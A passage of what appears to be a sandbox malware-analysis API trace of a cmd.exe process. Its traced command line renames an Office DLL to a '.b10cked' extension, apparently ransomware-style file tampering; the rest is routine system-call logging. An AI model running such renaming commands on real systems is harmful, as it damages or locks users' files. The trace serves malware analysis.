"pagefile_0x0000000000460000" filename = "" Region: id = 21258 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21259 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 320 os_tid = 0x78c [0154.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f9ac | out: lpSystemTimeAsFileTime=0x20f9ac*(dwLowDateTime=0x9641eaa0, dwHighDateTime=0x1d440a9)) [0154.888] GetCurrentProcessId () returned 0x15c [0154.888] GetCurrentThreadId () returned 0x78c [0154.888] GetTickCount () returned 0x2f9f7 [0154.888] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9a4 | out: lpPerformanceCount=0x20f9a4*=21167737390) returned 1 [0154.889] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0154.889] __set_app_type (_Type=0x1) [0154.889] __p__fmode () returned 0x76b331f4 [0154.889] __p__commode () returned 0x76b331fc [0154.889] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0154.889] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0154.889] GetCurrentThreadId () returned 0x78c [0154.889] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x78c) returned 0x38 [0154.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.889] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0154.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.889] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0154.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f93c | out: phkResult=0x20f93c*=0x0) returned 0x2 [0154.890] VirtualQuery (in: lpAddress=0x20f973, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0154.890] GetConsoleOutputCP () returned 0x1b5 [0154.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.890] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0154.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0154.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.891] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0154.891] GetEnvironmentStringsW () returned 0x370210* [0154.891] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0154.891] GetEnvironmentStringsW () returned 0x370210* [0154.891] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0154.891] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e8ac | out: phkResult=0x20e8ac*=0x40) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0xa0, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x0, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.891] RegCloseKey (hKey=0x40) returned 0x0 [0154.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e8ac | out: phkResult=0x20e8ac*=0x40) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x0, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x9, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x9, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x9, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.892] RegCloseKey (hKey=0x40) returned 0x0 [0154.892] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637d [0154.892] srand (_Seed=0x5b88637d) [0154.892] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"" [0154.892] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"" [0154.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.892] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0154.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0154.892] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0154.892] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.892] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0154.892] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0154.893] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0154.893] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0154.893] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0154.893] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0154.893] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0154.893] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0154.893] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0154.893] GetEnvironmentStringsW () returned 0x372360* [0154.893] FreeEnvironmentStringsW (penv=0x372360) returned 1 [0154.893] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.893] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.893] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0154.893] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0154.893] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0154.893] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0154.893] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0154.893] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0154.893] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0154.893] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0154.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f678 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f678, lpFilePart=0x20f674 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f674*="Desktop") returned 0x18 [0154.893] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.893] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f3f4 | out: lpFindFileData=0x20f3f4) returned 0x3709f0 [0154.894] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0154.894] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f3f4 | out: lpFindFileData=0x20f3f4) returned 0x3709f0 [0154.894] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0154.894] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f3f4 | out: lpFindFileData=0x20f3f4) returned 0x3709f0 [0154.894] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0154.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.894] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0154.894] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0154.894] GetEnvironmentStringsW () returned 0x370210* [0154.894] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0154.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.895] GetConsoleOutputCP () returned 0x1b5 [0154.895] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.895] GetUserDefaultLCID () returned 0x409 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f7b8, cchData=128 | out: lpLCData="0") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f7b8, cchData=128 | out: lpLCData="0") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f7b8, cchData=128 | out: lpLCData="1") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0154.896] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0154.897] GetConsoleTitleW (in: lpConsoleTitle=0x360930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.897] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0154.897] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0154.897] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0154.897] _wcsicmp (_String1="move", _String2=")") returned 68 [0154.897] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0154.897] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0154.898] _wcsicmp (_String1="IF", _String2="move") returned -4 [0154.898] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0154.898] _wcsicmp (_String1="REM", _String2="move") returned 5 [0154.898] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0154.901] GetConsoleTitleW (in: lpConsoleTitle=0x20f4b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.901] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0154.901] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0154.901] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0154.901] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0154.901] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0154.901] _wcsicmp (_String1="move", _String2="CD") returned 10 [0154.901] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0154.901] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0154.901] _wcsicmp (_String1="move", _String2="REN") returned -5 [0154.901] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0154.901] _wcsicmp (_String1="move", _String2="SET") returned -6 [0154.901] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0154.901] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0154.901] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0154.901] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0154.902] _wcsicmp (_String1="move", _String2="MD") returned 11 [0154.902] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0154.902] _wcsicmp (_String1="move", _String2="RD") returned -5 [0154.902] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0154.902] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0154.902] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0154.902] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0154.902] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0154.902] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0154.902] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0154.902] _wcsicmp (_String1="move", _String2="VER") returned -9 [0154.902] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0154.902] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0154.902] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0154.902] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0154.902] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0154.902] _wcsicmp (_String1="move", _String2="START") returned -6 [0154.902] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0154.902] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0154.902] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0154.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.904] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f26c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f264, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f264*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0154.906] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0154.906] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsint~1.trx")) returned 0x2020 [0154.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.906] SetErrorMode (uMode=0x0) returned 0x0 [0154.906] SetErrorMode (uMode=0x1) returned 0x0 [0154.906] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x20ebf4, lpFilePart=0x20ebdc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", lpFilePart=0x20ebdc*="OMSINT~1.TRX") returned 0x3c [0154.906] SetErrorMode (uMode=0x0) returned 0x1 [0154.906] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0154.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsint~1.trx")) returned 0x2020 [0154.907] SetErrorMode (uMode=0x0) returned 0x0 [0154.907] SetErrorMode (uMode=0x1) returned 0x0 [0154.907] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x20f070, lpFilePart=0x20ee08 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", lpFilePart=0x20ee08*="OMSINT~1.TRX") returned 0x3c [0154.907] SetErrorMode (uMode=0x0) returned 0x1 [0154.907] SetErrorMode (uMode=0x0) returned 0x0 [0154.907] SetErrorMode (uMode=0x1) returned 0x0 [0154.907] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f278, lpFilePart=0x20ee08 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x20ee08*="OMSINTL.DLL.trx_dll.b10cked") returned 0x4b [0154.907] SetErrorMode (uMode=0x0) returned 0x1 [0154.907] SetLastError (dwErrCode=0x0) [0154.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll.b10cked")) returned 0xffffffff [0154.907] GetLastError () returned 0x2 [0154.907] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20e784, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e784) returned 0x372130 [0154.907] FindNextFileW (in: hFindFile=0x372130, lpFindFileData=0x20e784 | out: lpFindFileData=0x20e784) returned 0 